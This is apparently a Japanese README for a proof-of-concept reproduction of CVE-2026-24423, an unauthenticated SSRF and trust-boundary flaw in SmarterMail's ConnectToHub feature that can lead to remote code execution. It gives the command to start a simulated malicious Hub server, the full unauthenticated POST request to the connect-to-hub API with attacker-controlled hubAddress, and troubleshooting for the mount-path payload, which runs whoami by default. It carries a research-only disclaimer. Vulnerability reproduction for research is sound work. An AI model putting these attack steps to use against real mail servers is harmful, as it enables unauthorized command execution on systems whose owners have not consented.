
CVE-2026-24423の再現スクリプト。SmarterMail ConnectToHubにおける信頼境界違反により、SSRFおよび潜在的なリモートコード実行を引き起こします。シミュレートされたHubサーバーと、脆弱なAPIをトリガーするための手順が含まれています。
# CVE-2026-24423 – 再現
> ⚠️ **セキュリティ研究および認可されたテスト専用 / For security research and authorized testing only**
## 概要(Overview)
このプロジェクトは **CVE-2026-24423** の脆弱性を再現するためのものです。
この脆弱性は **SmarterMail ConnectToHub** 機能に存在し、その根本原因は以下の通りです:
- 管理レベルのインターフェースが認証されていない
- サーバーがユーザー指定の Hub に自発的に接続する(SSRF)
- 外部 Hub から返されたデータがローカルのシステムレベル操作に直接使用される
この脆弱性は**設計レベルの信頼境界違反(Trust Boundary Violation)**に該当し、最終的にリモートコード実行につながる可能性があります。
このリポジトリは**脆弱性の検証と技術研究のみ**を目的としており、武器化した利用を意図したものではありません。
Start Hub Simulation Server
python3 cve-2026-24423.py
このスクリプトは以下を行います:
SystemMount 設定を含む JSON レスポンスを返すTrigger the Vulnerable API
Yakit または Burp Suite を使用してリクエストを送信します:
POST /api/v1/settings/sysadmin/connect-to-hub HTTP/1.1
Host: ip:port
Content-Type: application/json
{
"hubAddress": "http://ip",
"oneTimePassword": "test",
"nodeName": "victim"
}
このインターフェースは認証を必要としません No authentication is required.
Troubleshooting
脆弱性の再現に失敗した場合:
cve-2026-24423.py 内の MountPath パラメータを変更してくださいResult
脆弱性のトリガーに成功すると、SmarterMail は Hub から返されたデータを解析し、デフォルトのコードは whoami コマンドのみを実行します。
スクリーンショット例 / Example:

このプロジェクトはChatGPT によって完成されました。